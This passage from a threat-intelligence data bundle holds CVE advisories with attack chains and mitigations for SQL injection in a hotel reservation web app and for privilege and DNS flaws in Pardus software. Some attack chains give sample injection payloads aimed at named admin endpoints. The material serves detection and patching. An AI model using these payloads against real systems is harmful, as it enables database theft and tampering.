attacker's arbitrary SQL commands.\n6. Successful SQL injection allows the attacker to retrieve sensitive information (e.g., user credentials, booking details) from the database, modify existing data, or potentially gain further access to the underlying server depending on database privileges.\n7. The attacker exfiltrates the compromised data or leverages the access for further malicious activities, such as website defacement or pivot to other systems.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14763 can lead to severe consequences for organizations using the `code-projects Hotel and Tourism Reservation 1.0` software. Attackers can gain unauthorized access to the application's backend database, potentially leading to the exfiltration of sensitive customer data (e.g., personal information, contact details, booking histories), administrative credentials, and other proprietary business information. This data compromise can result in significant financial losses, reputational damage, regulatory penalties, and a loss of customer trust. Given the \"public exploit available\" status, organizations running affected versions face an imminent threat of being targeted and breached if not promptly patched.\n\n## Recommendation\n\n*   Immediately patch or update `code-projects Hotel and Tourism Reservation 1.0` to a non-vulnerable version if available. Monitor the `https://code-projects.org/` website for official patches.\n*   Deploy the Sigma rule `Detect CVE-2026-14763 Exploitation - SQL Injection in Tour Reservations Page` provided in this brief to your SIEM for early detection of exploitation attempts.\n*   Monitor web server logs for HTTP requests targeting `/admin/tour_reserves.php` with unusual or suspicious characters in the `tour` query parameter, as indicated in the Sigma rule.\n*   Implement a Web Application Firewall (WAF) in front of the `Hotel and Tourism Reservation` application to filter and block malicious SQL injection payloads targeting CVE-2026-14763.\n*   Regularly review and sanitize user input across all web applications to prevent similar SQL injection vulnerabilities.\n",
      "published": "2026-07-05T17:22:25Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "data-exfiltration"
      ],
      "object_refs": [
        "indicator--351df6d5-76c3-57bb-8694-35ff5f4b9f26",
        "indicator--1057f764-0025-50f0-9263-6500f8f940bb",
        "indicator--449b0b97-151a-528b-97bd-c6f252791166",
        "indicator--fcd59346-ed0d-58a6-baaf-2e1335b6fe94",
        "indicator--b24c5613-ea48-5668-b17a-d18e6c360d6a",
        "indicator--cbc483e8-9271-557a-af17-88727d3e3c66",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14763"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-tour_reserves.php-SQLi.md"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14763"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/850581"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376352"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376352/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4d724f2-0fb0-521a-9f94-bc3d42c7d487",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3cf93d5a-00ce-566d-a3d6-8cdf3011e48d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3cf93d5a-00ce-566d-a3d6-8cdf3011e48d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14762: Remote SQL Injection in code-projects Hotel and Tourism Reservation",
      "description": "## Overview\n\nA significant vulnerability, identified as CVE-2026-14762, has been discovered in code-projects Hotel and Tourism Reservation version 1.0. This flaw specifically impacts an unspecified function within the `/admin/rooms.php` file, part of the application's Room Management Page. Attackers can exploit this vulnerability by manipulating the `delete` argument with SQL injection payloads. This issue is remotely exploitable, meaning an attacker does not require local access to the affected system. The exploit code for CVE-2026-14762 is publicly available, increasing the urgency for immediate mitigation by organizations utilizing this software. Successful exploitation can lead to unauthorized access, modification, or deletion of database contents, potentially compromising sensitive customer or reservation data.\n\n## Attack Chain\n\n1.  Attacker identifies a vulnerable instance of code-projects Hotel and Tourism Reservation 1.0 exposed to the internet.\n2.  Attacker crafts a malicious HTTP GET request targeting the `/admin/rooms.php` endpoint.\n3.  The request includes a specially crafted SQL injection payload within the `delete` argument, bypassing input sanitization (e.g., `GET /admin/rooms.php?delete=' OR 1=1--`).\n4.  The vulnerable PHP application processes the request and concatenates the malicious `delete` argument value directly into an SQL query.\n5.  The backend database executes the attacker-controlled SQL query, treating the payload as legitimate SQL code.\n6.  Depending on the payload, the database may return sensitive information, allow data modification/deletion, or enable further database compromise.\n7.  The application returns the result of the arbitrary SQL query to the attacker via the HTTP response.\n8.  Attacker achieves unauthorized access to, or modification of, the application's underlying database, potentially leading to full data compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14762 grants attackers unauthorized access to the application's database. This can lead to the exfiltration of sensitive information, such as customer details, reservation data, or administrator credentials. Attackers could also modify or delete critical operational data, causing service disruption or data integrity issues. Given that the exploit is public, organizations using Hotel and Tourism Reservation 1.0 are at immediate and severe risk of data breaches and operational downtime. The CVSS v3.1 score of 7.3 (HIGH) reflects the potential for significant impact on confidentiality, integrity, and availability.\n\n## Recommendation\n\n*   Patch CVE-2026-14762 by updating code-projects Hotel and Tourism Reservation 1.0 to a secure version as soon as a fix is available from the vendor.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect exploitation attempts.\n*   Implement a Web Application Firewall (WAF) to inspect and block malicious HTTP requests containing SQL injection payloads targeting `/admin/rooms.php`.\n*   Regularly review web server access logs for suspicious requests to `/admin/rooms.php` that include uncommon characters or SQL keywords in the query parameters.\n",
      "published": "2026-07-05T16:20:55Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "php"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14762"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-rooms.php-SQLi.md"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14762"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/850580"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376351"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376351/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f83f4eda-8204-5c3e-9c12-da58f0fbef21",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-9085: Incorrect Permissions Allow DNS Spoofing in Pardus-Parental-Control",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-9085, has been identified in the TUBITAK BILGEM Software Technologies Research Institute's Pardus-Parental-Control software. This flaw is rooted in incorrect permission assignment for critical resources and improper access control mechanisms. Specifically, versions up to and including 0.5.1, and all versions prior to 0.7.0, are susceptible. The vulnerability enables a local attacker to execute DNS Spoofing, potentially redirecting user traffic to malicious sites, facilitating phishing attacks, or intercepting sensitive data. The CVSS v3.1 base score for this vulnerability is 8.8 (High), highlighting its severe impact if exploited. Organizations utilizing affected versions of Pardus-Parental-Control are advised to apply the necessary updates immediately to mitigate this risk.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-9085 allows a local attacker to conduct DNS Spoofing. This can lead to various severe consequences for users, including redirection to malicious websites, interception of network traffic, credential harvesting through phishing campaigns, and man-in-the-middle attacks. While specific victim counts or industry targeting are not detailed in the available information, any user of the affected Pardus-Parental-Control software could be vulnerable. The primary risk is loss of confidentiality and integrity of network communications, potentially leading to unauthorized access to systems or data.\n\n## Recommendation\n\n*   **Patch CVE-2026-9085** by upgrading Pardus-Parental-Control to version 0.7.0 or newer immediately. Refer to the vendor's advisory at `https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0500`.\n*   Implement host-based intrusion detection systems (HIDS) to monitor for unauthorized modifications to critical system files or DNS configuration settings, which could indicate attempts to exploit `CWE-284` or `CWE-732`.\n*   Monitor local network traffic for unusual DNS queries or responses that could indicate `DNS Spoofing` attempts originating from controlled systems.\n",
      "published": "2026-07-05T15:21:47Z",
      "labels": [
        "dns-spoofing",
        "access-control",
        "linux",
        "vulnerability"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9085"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0500"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8fbce801-239f-5716-bfec-1e53f63a178b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1611c473-048f-55b6-99d3-72fbfcae5f1f",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1611c473-048f-55b6-99d3-72fbfcae5f1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-6509 — Missing Authorization Vulnerability in Pardus Update Allows Privilege Escalation",
      "description": "## Overview\n\nA critical missing authorization vulnerability, identified as CVE-2026-6509, has been discovered in the Pardus Update software developed by TUBITAK BILGEM Software Technologies Research Institute. This flaw affects all versions of Pardus Update up to and including 0.6.3. The vulnerability allows an authenticated but low-privileged local user to bypass security checks and perform actions that should require higher privileges, ultimately leading to privilege escalation on the host system. This is significant for defenders as it means a compromised standard user account on a Pardus Linux machine could potentially gain root access, undermining system integrity and confidentiality. While no in-the-wild exploitation has been reported, the nature of a missing authorization vulnerability in an update mechanism makes it a high-risk target for adversaries seeking persistent and elevated access.\n\n## Attack Chain\n\nThis attack chain describes the theoretical exploitation of CVE-2026-6509, a missing authorization vulnerability, for privilege escalation. The source does not detail specific observed exploitation in the wild.\n\n1.  **Initial Access**: A low-privileged attacker gains initial access to a Pardus Linux system via various means (e.g., compromised credentials, software vulnerability, or physical access).\n2.  **User Authentication**: The attacker successfully authenticates to the system as a standard, unprivileged user.\n3.  **Vulnerability Identification**: The attacker identifies the vulnerable Pardus Update component (version \u003c=0.6.3) and its missing authorization flaw (CVE-2026-6509).\n4.  **Malicious Request Crafting**: The attacker crafts a request or command targeting the Pardus Update component, designed to perform an action typically reserved for administrative users.\n5.  **Authorization Bypass**: Due to the missing authorization check, the vulnerable Pardus Update component processes the attacker's request, despite the attacker lacking the necessary privileges.\n6.  **Privilege Escalation**: The unauthorized action successfully executes, leading to the attacker gaining elevated privileges, potentially root, on the Pardus Linux system.\n7.  **Impact**: With escalated privileges, the attacker can then install malicious software, exfiltrate sensitive data, modify system configurations, or create new privileged accounts, achieving full control over the compromised system.\n\n## Impact\n\nA successful exploitation of CVE-2026-6509 would result in a local low-privileged user gaining root access on the affected Pardus Linux system. This allows the attacker to fully compromise the system, including installing arbitrary software, modifying system files and configurations, creating new privileged user accounts, and potentially disabling security measures. Organizations utilizing Pardus Linux distributions for servers or workstations could face severe data breaches, system integrity loss, and widespread disruption if an attacker gains an initial foothold. The compromise of a system's update mechanism is particularly severe, as it could be leveraged to distribute further malware or maintain persistence.\n\n## Recommendation\n\n*   Immediately patch all instances of Pardus Update to version 0.6.6 or higher to remediate CVE-2026-6509.\n*   Review system logs for any unusual activity from low-privileged users interacting with the Pardus Update component prior to patching.\n*   Ensure that Pardus Linux systems are kept up-to-date with the latest security patches to mitigate known vulnerabilities.\n",
      "published": "2026-07-05T15:20:56Z",
      "labels": [
        "privilege-escalation",
        "linux",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6509"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0501"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7f550619-d0e2-5f8f-a160-409ddab01dfa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://code-projects.org/",
      "pattern": "[url:value = 'https://code-projects.org/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T15:20:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--632e9296-91b5-567c-a968-8ffffc7a8d47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "indicator--7f550619-d0e2-5f8f-a160-409ddab01dfa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--61ed2669-e2b2-511f-a6b2-30a97d554d6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-add_tour.php-SQLi.md",
      "pattern": "[url:value = 'https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-add_tour.php-SQLi.md']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T15:20:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c903a273-b612-581a-b39b-93e121d5e0ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "indicator--61ed2669-e2b2-511f-a6b2-30a97d554d6a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3c0978cc-9801-5273-b6b4-10cbe0a1f842",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14756",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14756']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T15:20:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--86a78821-bb38-5b9b-9d70-6307c7f2d15b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "indicator--3c0978cc-9801-5273-b6b4-10cbe0a1f842"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--353db4d7-e29c-5300-869a-ac01891a4e4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/850366",
      "pattern": "[url:value = 'https://vuldb.com/submit/850366']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T15:20:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9d88680a-5467-5ff6-8afc-df366f0cdbd5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "indicator--353db4d7-e29c-5300-869a-ac01891a4e4d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--327ae87f-ef88-58a0-b1c3-55ac77ce7c5f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376345",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376345']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T15:20:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d60db49c-6a41-52fe-96c0-ea2d09b07335",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "indicator--327ae87f-ef88-58a0-b1c3-55ac77ce7c5f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f6448ac4-cc21-53cf-bd58-262c61620246",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376345/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376345/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T15:20:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6b1fdaaf-263f-50fb-bf5a-9a72fff4d8d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "indicator--f6448ac4-cc21-53cf-bd58-262c61620246"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2111ca0-14f6-5910-818f-d7d53bcd919e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Systems",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0340ff9-1567-560f-b7b8-e1fbb3f1c453",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4661a5f2-30dc-5f68-b4d8-366263d51aeb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--78e5fd1e-3e1f-540c-bf40-56e2b6530c47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14756: SQL Injection in code-projects Hotel and Tourism Reservation",
      "description": "## Overview\n\nA critical SQL injection vulnerability, identified as CVE-2026-14756, has been discovered in version 1.0 of the code-projects Hotel and Tourism Reservation web application. This flaw resides within the Tour Management Page component, specifically affecting the `/admin/add_tour.php` file. The vulnerability stems from insufficient sanitization of user-supplied input, allowing attackers to manipulate the `delete_image` argument with malicious SQL queries. This remote vulnerability enables unauthenticated attackers to bypass security measures, gain unauthorized access to the database, extract sensitive information, or corrupt data. The exploit details for this vulnerability have been publicly disclosed, increasing the urgency for immediate remediation due to the heightened risk of exploitation in the wild. Defenders must prioritize patching and implementing robust detection mechanisms.\n\n## Attack Chain\n\n1.  Attacker identifies an exposed instance of code-projects Hotel and Tourism Reservation version 1.0.\n2.  Attacker crafts a specially designed HTTP POST request targeting the `/admin/add_tour.php` endpoint.\n3.  The crafted request includes an SQL injection payload embedded within the `delete_image` parameter.\n4.  The vulnerable application processes this request without properly sanitizing the `delete_image` input, directly incorporating the malicious payload into a backend SQL query.\n5.  The database executes the attacker's injected SQL query, allowing for unauthorized data access, modification, or deletion.\n6.  Attacker leverages the successful SQL injection to bypass authentication, exfiltrate sensitive data (e.g., user credentials, booking details), or manipulate existing database records.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14756 can lead to severe consequences for organizations utilizing the vulnerable application. Attackers can gain full control over the application's database, leading to the compromise of customer personal identifiable information (PII), payment data, and sensitive business operational details. This can result in significant financial losses, reputational damage, regulatory penalties, and potential service disruption due to data manipulation or deletion. With the exploit publicly available, organizations face an immediate and high risk of data breaches and system integrity compromise if the vulnerability remains unpatched.\n\n## Recommendation\n\n*   Immediately patch or apply available updates for `code-projects Hotel and Tourism Reservation 1.0` to address `CVE-2026-14756`.\n*   Deploy the Sigma rule provided in this brief to your SIEM for detection of `CVE-2026-14756` exploitation attempts.\n*   Ensure Web Application Firewall (WAF) rules are configured to detect and block common SQL injection patterns, specifically targeting requests to `/admin/add_tour.php` with suspicious `delete_image` parameter values.\n*   Monitor web server access logs for `/admin/add_tour.php` for requests containing known SQL injection syntax or unusual characters.\n",
      "published": "2026-07-05T15:20:14Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "code-projects"
      ],
      "object_refs": [
        "indicator--7f550619-d0e2-5f8f-a160-409ddab01dfa",
        "indicator--61ed2669-e2b2-511f-a6b2-30a97d554d6a",
        "indicator--3c0978cc-9801-5273-b6b4-10cbe0a1f842",
        "indicator--353db4d7-e29c-5300-869a-ac01891a4e4d",
        "indicator--327ae87f-ef88-58a0-b1c3-55ac77ce7c5f",
        "indicator--f6448ac4-cc21-53cf-bd58-262c61620246",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14756"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-add_tour.php-SQLi.md"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14756"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/850366"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376345"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376345/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c3e52630-11d5-54ae-9563-464e2f3e0286",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-add_event.php-SQLi.md",
      "pattern": "[url:value = 'https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-add_event.php-SQLi.md']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T15:19:25Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--315f9e99-b23f-5bda-8fc6-165325d4eca6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3195a032-0657-5762-ae9f-20e9718b20b2",
      "target_ref": "indicator--c3e52630-11d5-54ae-9563-464e2f3e0286"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bbe7434e-7bb7-56c6-afa7-16053869972f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url_path: /admin/reservations.php",
      "pattern": "[x-ti-bot:url_path = '/admin/reservations.php']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T15:19:25Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd7d2677-0884-59e6-b20f-d19f74da9806",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3195a032-0657-5762-ae9f-20e9718b20b2",
      "target_ref": "indicator--bbe7434e-7bb7-56c6-afa7-16053869972f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3ba7089c-dd35-529d-86eb-977cc1308df4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3195a032-0657-5762-ae9f-20e9718b20b2",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--faa7271b-4e2f-59d9-843c-642ece34a485",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3195a032-0657-5762-ae9f-20e9718b20b2",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3195a032-0657-5762-ae9f-20e9718b20b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14755: Remote SQL Injection in code-projects Hotel and Tourism Reservation",
      "description": "## Overview\n\nA high-severity remote SQL injection vulnerability, identified as CVE-2026-14755, has been discovered in version 1.0 of the code-projects Hotel and Tourism Reservation application. This flaw resides in the `/admin/reservations.php` file, within the Reservations Management Page component. Attackers can remotely exploit this by manipulating the `delete` argument in HTTP requests, leading to arbitrary SQL query execution on the backend database. This vulnerability allows for unauthorized access to, modification of, or deletion of sensitive reservation data. The exploit details have been publicly disclosed, increasing the risk of widespread exploitation. Organizations using this specific version of the software are urged to take immediate action to mitigate the risk of data compromise, service disruption, and potential full system compromise.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies an exposed instance of code-projects Hotel and Tourism Reservation 1.0.\n2.  The attacker crafts a malicious HTTP GET request targeting the `/admin/reservations.php` endpoint.\n3.  The request includes a specifically crafted `delete` argument containing SQL injection payloads (e.g., `delete=' UNION SELECT ... --'`).\n4.  The vulnerable application processes this `delete` argument without proper input sanitization, leading to the attacker's SQL payload being appended to and executed by the backend database query.\n5.  The application's response reveals information about the database structure or sensitive data extracted via the SQL injection.\n6.  The attacker leverages the successful injection to exfiltrate confidential customer and reservation data, manipulate existing records, or potentially gain further access to the underlying system depending on database privileges.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14755 can lead to severe consequences for organizations utilizing the vulnerable software. Attackers can gain full control over the application's database, allowing them to exfiltrate sensitive customer information (names, contact details, payment information if stored), manipulate or delete reservation records, and potentially disrupt business operations. Given the public disclosure of the exploit, any internet-facing instance of Hotel and Tourism Reservation 1.0 is at 